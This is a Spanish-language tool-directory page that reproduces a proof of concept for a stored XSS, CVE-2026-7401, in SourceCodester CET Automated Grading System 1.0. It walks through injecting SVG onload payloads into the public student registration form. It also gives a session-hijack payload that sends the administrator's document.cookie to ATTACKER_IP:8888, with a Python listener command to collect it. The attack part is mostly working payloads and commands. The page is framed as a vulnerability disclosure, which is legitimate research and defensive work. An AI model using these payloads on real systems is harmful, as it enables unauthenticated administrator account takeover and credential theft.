Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-7401-XSS — Prueba de concepto para XSS almacenado en SourceCodester CET Automated Grading System 1.0, que demuestra la inyección de payload sin autenticación a través del registro de estudiantes, lo que conduce al secuestro de la sesión del administrador. | Kitploit
Herramientas/GitHubGitHub/xmyronn/cve-2026-7401-xss
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubxmyronn/cve-2026-7401-xss

CVE-2026-7401-XSS

Prueba de concepto para XSS almacenado en SourceCodester CET Automated Grading System 1.0, que demuestra la inyección de payload sin autenticación a través del registro de estudiantes, lo que conduce al secuestro de la sesión del administrador.

Ver Repositorio
hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

XSS Almacenado en CET Automated Grading System — Registro de Estudiantes (Sin Autenticación → Panel de Administración)

Detalles

CampoValor
VendedorSourceCodester
URL del Vendedorhttps://www.sourcecodester.com
ProductoCET Automated Grading System con AI Predictive Analytics en PHP y MySQL
URL del Productohttps://www.sourcecodester.com/php/18686/cet-automated-grading-system-ai-predictive-analytics-php-and-mysql.html
Versión1.0
VulnerabilidadCross-Site Scripting (XSS) Almacenado
CWECWE-79
Puntuación CVSSv38.8 (Alta)
Vector de AtaqueRed
Autenticación RequeridaNinguna (El auto-registro de estudiantes es público)
VíctimaAdministrador
Interacción del UsuarioRequerida (El administrador visita el panel)
InvestigadorImad Alvi
Fecha2026-04-13

Componente Afectado

Archivo: PersonalAGS/index.php?action=register (Registro de Estudiantes)
Parámetros: student_id, full_name, section, username (POST)
Se activa en: PersonalAGS/index.php?action=dashboard (Panel de Administración)


Descripción

El portal de auto-registro de estudiantes en CET Automated Grading System 1.0 no sanitiza ni codifica la entrada proporcionada por el usuario antes de almacenarla en la base de datos. Un atacante sin autenticación puede registrar una cuenta de estudiante con payloads de JavaScript inyectados en cualquier campo del registro. El payload malicioso se almacena en la base de datos y se ejecuta en el navegador de cualquier administrador que visite el panel donde se listan los estudiantes inscritos.

Esta es una cadena de ataque crítica: no se requiere autenticación para inyectar el payload, pero se ejecuta en un contexto administrativo privilegiado, lo que permite el robo de cookies de sesión y la toma completa de la cuenta de administrador.


Prueba de Concepto

Paso 1 — Navegar al Registro de Estudiantes (Sin Autenticación Requerida)

Navegue a la página pública de auto-registro de estudiantes:

root@kitploit:~
http://localhost/cet-personalagms/PersonalAGS/index.php?action=register

Paso 2 — Inyectar el Payload XSS en los Campos de Registro

Complete todos los campos con payloads XSS y haga clic en Registrar Cuenta:

  • Número de ID de Estudiante: "><svg onload=alert(1)>
  • Nombre Completo: "><svg onload=alert(1)>
  • Sección: "><svg onload=alert(1)>
  • Nombre de Usuario Deseado: "><svg onload=alert(1)>
Screenshot 2026-04-13 030707

El registro se completa correctamente: los payloads se almacenan en la base de datos.

Paso 3 — El XSS se Activa en el Panel de Administración

Cuando el administrador inicia sesión y visita el panel, el payload inyectado se ejecuta inmediatamente. La ventana emergente de alerta se activa y el diseño de la página se rompe visiblemente por el HTML inyectado, lo que confirma que el payload se renderiza sin sanitizar en el panel de administración.

Los encabezados de sección del panel también reflejan los valores inyectados:

  • 1ST YEAR - SECTION 1ST YEAR" ONMOUSEOVE
  • 3RD YEAR - SECTION " ONLOAD=ALERT(1) X=
Screenshot 2026-04-13 030717

Payload de Secuestro de Sesión

Un atacante puede escalar esto a un secuestro completo de la sesión del administrador utilizando el siguiente payload en los campos de registro:

root@kitploit:~
" onmouseover="new Image().src='http://ATTACKER_IP:8888/?c='+document.cookie" x="

Configure un listener en la máquina del atacante:

root@kitploit:~
python3 -m http.server 8888

Cuando el administrador visita el panel, su cookie de sesión se envía al servidor del atacante, lo que permite la toma completa de la cuenta.


Impacto

Un atacante sin autenticación puede:

  • Inyectar JavaScript persistente en el panel de administración mediante el registro público de estudiantes
  • Robar la cookie de sesión del administrador y tomar el control de la cuenta de administrador
  • Realizar cualquier acción administrativa en nombre de la víctima
  • Redirigir a los administradores a páginas maliciosas
  • Desfigurar el panel de administración

No se requiere autenticación para inyectar el payload. El ataque se ejecuta automáticamente cuando cualquier administrador visita el panel.


Referencias

  • SourceCodester — CET Automated Grading System
  • CWE-79: Neutralización incorrecta de la entrada durante la generación de páginas web.
Descargar herramienta